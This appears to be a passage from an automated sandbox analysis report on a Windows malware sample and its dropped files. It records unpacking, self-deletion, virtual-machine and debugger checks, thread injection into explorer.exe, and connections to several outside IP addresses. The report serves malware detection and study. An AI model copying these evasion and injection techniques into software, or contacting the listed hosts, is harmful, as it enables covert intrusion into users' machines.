                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeSection loaded: msvcr100.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\teihrdrSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\teihrdrSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\teihrdrSection loaded: msvcr100.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jtihrdrSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jtihrdrSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jtihrdrSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jtihrdrSection loaded: msvcr100.dllJump to behavior
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32Jump to behavior
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: BzLGqYKy7o.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeUnpacked PE file: 0.2.BzLGqYKy7o.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.gol:R;.xowujad:R;.xonag:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Roaming\teihrdrUnpacked PE file: 4.2.teihrdr.400000.0.unpack .text:ER;.rdata:R;.data:W;.gol:R;.xowujad:R;.xonag:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeUnpacked PE file: 7.2.B9A0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.fulocu:R;.soro:R;.kefef:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Roaming\teihrdrUnpacked PE file: 8.2.teihrdr.400000.0.unpack .text:ER;.rdata:R;.data:W;.gol:R;.xowujad:R;.xonag:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Roaming\jtihrdrUnpacked PE file: 9.2.jtihrdr.400000.0.unpack .text:ER;.rdata:R;.data:W;.fulocu:R;.soro:R;.kefef:W;.rsrc:R; vs .text:EW;
                Source: BzLGqYKy7o.exeStatic PE information: section name: .gol
                Source: BzLGqYKy7o.exeStatic PE information: section name: .xowujad
                Source: BzLGqYKy7o.exeStatic PE information: section name: .xonag
                Source: B9A0.exe.2.drStatic PE information: section name: .fulocu
                Source: B9A0.exe.2.drStatic PE information: section name: .soro
                Source: B9A0.exe.2.drStatic PE information: section name: .kefef
                Source: jtihrdr.2.drStatic PE information: section name: .fulocu
                Source: jtihrdr.2.drStatic PE information: section name: .soro
                Source: jtihrdr.2.drStatic PE information: section name: .kefef
                Source: teihrdr.2.drStatic PE information: section name: .gol
                Source: teihrdr.2.drStatic PE information: section name: .xowujad
                Source: teihrdr.2.drStatic PE information: section name: .xonag
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeCode function: 0_2_004014D9 pushad ; ret 0_2_004014E9
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeCode function: 0_2_004031DB push eax; ret 0_2_004032AB
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeCode function: 0_2_004E1540 pushad ; ret 0_2_004E1550
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeCode function: 0_2_005B3C29 push esp; ret 0_2_005B3C2B
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeCode function: 0_2_005B2AC9 pushfd ; iretd 0_2_005B2ACA
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeCode function: 0_2_005B1FCC push B63524ADh; retn 001Fh0_2_005B2003
                Source: C:\Users\user\AppData\Roaming\teihrdrCode function: 4_2_004014D9 pushad ; ret 4_2_004014E9
                Source: C:\Users\user\AppData\Roaming\teihrdrCode function: 4_2_004031DB push eax; ret 4_2_004032AB
                Source: C:\Users\user\AppData\Roaming\teihrdrCode function: 4_2_00601540 pushad ; ret 4_2_00601550
                Source: C:\Users\user\AppData\Roaming\teihrdrCode function: 4_2_006A33F1 push esp; ret 4_2_006A33F3
                Source: C:\Users\user\AppData\Roaming\teihrdrCode function: 4_2_006A2291 pushfd ; iretd 4_2_006A2292
                Source: C:\Users\user\AppData\Roaming\teihrdrCode function: 4_2_006A1794 push B63524ADh; retn 001Fh4_2_006A17CB
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeCode function: 7_2_0040100B push esi; ret 7_2_0040100C
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeCode function: 7_2_0040280E push esp; ret 7_2_004029C6
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeCode function: 7_2_0040281F push esp; ret 7_2_004029C6
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeCode function: 7_2_00402822 push esp; ret 7_2_004029C6
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeCode function: 7_2_00401328 push edi; retf 7_2_0040132A
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeCode function: 7_2_004027ED push esp; ret 7_2_004029C6
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeCode function: 7_2_004027FB push esp; ret 7_2_004029C6
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeCode function: 7_2_005A1A58 push 9A832F1Fh; iretd 7_2_005A1A5E
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeCode function: 7_2_0059FFD3 push esi; ret 7_2_0059FFD4
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeCode function: 7_2_005A02EA push edi; retf 7_2_005A02EB
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeCode function: 7_2_01FA2889 push esp; ret 7_2_01FA2A2D
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeCode function: 7_2_01FA1386 push edi; retf 7_2_01FA1391
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeCode function: 7_2_01FA2886 push esp; ret 7_2_01FA2A2D
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeCode function: 7_2_01FA1072 push esi; ret 7_2_01FA1073
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeCode function: 7_2_01FA2875 push esp; ret 7_2_01FA2A2D
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeCode function: 7_2_01FA2862 push esp; ret 7_2_01FA2A2D
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeCode function: 7_2_01FA2854 push esp; ret 7_2_01FA2A2D
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeCode function: 7_2_01FA1909 push esp; iretd 7_2_01FA19BF
                Source: C:\Users\user\AppData\Roaming\teihrdrCode function: 8_2_004014D9 pushad ; ret 8_2_004014E9
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\B9A0.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\teihrdrJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\jtihrdrJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\jtihrdrJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\teihrdrJump to dropped file

                Hooking and other Techniques for Hiding and Protection

                barindex
                Deletes itself after installation
                Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\bzlgqyky7o.exeJump to behavior
                Hides that the sample has been downloaded from the Internet (zone.identifier)
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\teihrdr:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\jtihrdr:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Checks if the current machine is a virtual machine (disk enumeration)
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\teihrdrKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\teihrdrKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\teihrdrKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\teihrdrKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\teihrdrKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\teihrdrKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\teihrdrKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\teihrdrKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\teihrdrKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\teihrdrKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\teihrdrKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\teihrdrKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\jtihrdrKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\jtihrdrKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\jtihrdrKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\jtihrdrKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\jtihrdrKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\jtihrdrKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeAPI/Special instruction interceptor: Address: 7FF8C88EE814
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeAPI/Special instruction interceptor: Address: 7FF8C88ED584
                Source: C:\Users\user\AppData\Roaming\teihrdrAPI/Special instruction interceptor: Address: 7FF8C88EE814
                Source: C:\Users\user\AppData\Roaming\teihrdrAPI/Special instruction interceptor: Address: 7FF8C88ED584
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeAPI/Special instruction interceptor: Address: 7FF8C88EE814
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeAPI/Special instruction interceptor: Address: 7FF8C88ED584
                Source: C:\Users\user\AppData\Roaming\jtihrdrAPI/Special instruction interceptor: Address: 7FF8C88EE814
                Source: C:\Users\user\AppData\Roaming\jtihrdrAPI/Special instruction interceptor: Address: 7FF8C88ED584
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: jtihrdr, 00000009.00000002.2882496618.000000000056E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK*
                Source: BzLGqYKy7o.exe, 00000000.00000002.2132466453.000000000058E000.00000004.00000020.00020000.00000000.sdmp, B9A0.exe, 00000007.00000002.2644794395.000000000057E000.00000004.00000020.00020000.00000000.sdmp, teihrdr, 00000008.00000002.2780667881.0000000000727000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 424Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 785Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 561Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 732Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 886Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 867Jump to behavior
                Source: C:\Windows\explorer.exe TID: 344Thread sleep count: 424 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 5052Thread sleep count: 785 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 5052Thread sleep time: -78500s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 2788Thread sleep count: 561 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 2788Thread sleep time: -56100s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 1292Thread sleep count: 246 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 1272Thread sleep count: 267 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 1784Thread sleep count: 275 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 5580Thread sleep count: 170 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 5524Thread sleep count: 111 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 1408Thread sleep count: 82 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 5260Thread sleep count: 164 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 4308Thread sleep count: 115 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 5052Thread sleep count: 732 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 5052Thread sleep time: -73200s >= -30000sJump to behavior
                Source: explorer.exe, 00000002.00000000.2117666934.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
                Source: explorer.exe, 00000002.00000000.2119469337.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
                Source: explorer.exe, 00000002.00000000.2119469337.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0r
                Source: explorer.exe, 00000002.00000000.2119469337.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                Source: explorer.exe, 00000002.00000000.2119469337.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
                Source: explorer.exe, 00000002.00000000.2119469337.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
                Source: explorer.exe, 00000002.00000000.2119469337.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000002.00000000.2116701532.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                Source: explorer.exe, 00000002.00000000.2119469337.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                Source: explorer.exe, 00000002.00000000.2116701532.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 d9 2e dc 89 72 dX
                Source: explorer.exe, 00000002.00000000.2115964908.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
                Source: explorer.exe, 00000002.00000000.2117666934.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
                Source: explorer.exe, 00000002.00000000.2119469337.0000000009B2C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: explorer.exe, 00000002.00000000.2116701532.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
                Source: explorer.exe, 00000002.00000000.2116701532.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware,p
                Source: explorer.exe, 00000002.00000000.2119469337.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
                Source: explorer.exe, 00000002.00000000.2119469337.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
                Source: explorer.exe, 00000002.00000000.2115964908.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                Source: explorer.exe, 00000002.00000000.2119469337.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000002.00000000.2117666934.000000000769A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\teihrdrSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\teihrdrSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\jtihrdrSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\teihrdrProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\teihrdrProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\jtihrdrProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeCode function: 0_2_004E092B mov eax, dword ptr fs:[00000030h]0_2_004E092B
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeCode function: 0_2_004E0D90 mov eax, dword ptr fs:[00000030h]0_2_004E0D90
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeCode function: 0_2_005AFAAD push dword ptr fs:[00000030h]0_2_005AFAAD
                Source: C:\Users\user\AppData\Roaming\teihrdrCode function: 4_2_0060092B mov eax, dword ptr fs:[00000030h]4_2_0060092B
                Source: C:\Users\user\AppData\Roaming\teihrdrCode function: 4_2_00600D90 mov eax, dword ptr fs:[00000030h]4_2_00600D90
                Source: C:\Users\user\AppData\Roaming\teihrdrCode function: 4_2_0069F275 push dword ptr fs:[00000030h]4_2_0069F275
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeCode function: 7_2_0059EE02 push dword ptr fs:[00000030h]7_2_0059EE02
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeCode function: 7_2_01FA0D90 mov eax, dword ptr fs:[00000030h]7_2_01FA0D90
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeCode function: 7_2_01FA092B mov eax, dword ptr fs:[00000030h]7_2_01FA092B
                Source: C:\Users\user\AppData\Roaming\teihrdrCode function: 8_2_0070092B mov eax, dword ptr fs:[00000030h]8_2_0070092B
                Source: C:\Users\user\AppData\Roaming\teihrdrCode function: 8_2_00700D90 mov eax, dword ptr fs:[00000030h]8_2_00700D90
                Source: C:\Users\user\AppData\Roaming\teihrdrCode function: 8_2_00740DF5 push dword ptr fs:[00000030h]8_2_00740DF5
                Source: C:\Users\user\AppData\Roaming\jtihrdrCode function: 9_2_0052092B mov eax, dword ptr fs:[00000030h]9_2_0052092B
                Source: C:\Users\user\AppData\Roaming\jtihrdrCode function: 9_2_00520D90 mov eax, dword ptr fs:[00000030h]9_2_00520D90
                Source: C:\Users\user\AppData\Roaming\jtihrdrCode function: 9_2_0058EC2A push dword ptr fs:[00000030h]9_2_0058EC2A

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Benign windows process drops PE files
                Source: C:\Windows\explorer.exeFile created: jtihrdr.2.drJump to dropped file
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\explorer.exeNetwork Connect: 188.40.141.211 443Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 105.197.97.247 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 189.195.132.134 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 23.145.40.164 443Jump to behavior
                Creates a thread in another existing process (thread injection)
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeThread created: C:\Windows\explorer.exe EIP: 87C19A8Jump to behavior
                Source: C:\Users\user\AppData\Roaming\teihrdrThread created: unknown EIP: 88019A8Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeThread created: unknown EIP: 9861970Jump to behavior
                Source: C:\Users\user\AppData\Roaming\teihrdrThread created: unknown EIP: 9EE19A8Jump to behavior
                Source: C:\Users\user\AppData\Roaming\jtihrdrThread created: unknown EIP: 3181970Jump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\Desktop\BzLGqYKy7o.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Source: C:\Users\user\AppData\Roaming\teihrdrSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\teihrdrSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B9A0.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Source: C:\Users\user\AppData\Roaming\teihrdrSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\teihrdrSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Source: C:\Users\user\AppData\Roaming\jtihrdrSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\jtihrdrSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Source: explorer.exe, 00000002.00000000.2119469337.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd=
                Source: explorer.exe, 00000002.00000000.2116332496.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: explorer.exe, 00000002.00000000.2117520467.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2116332496.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: explorer.exe, 00000002.00000000.2116332496.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: explorer.exe, 00000002.00000000.2116332496.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
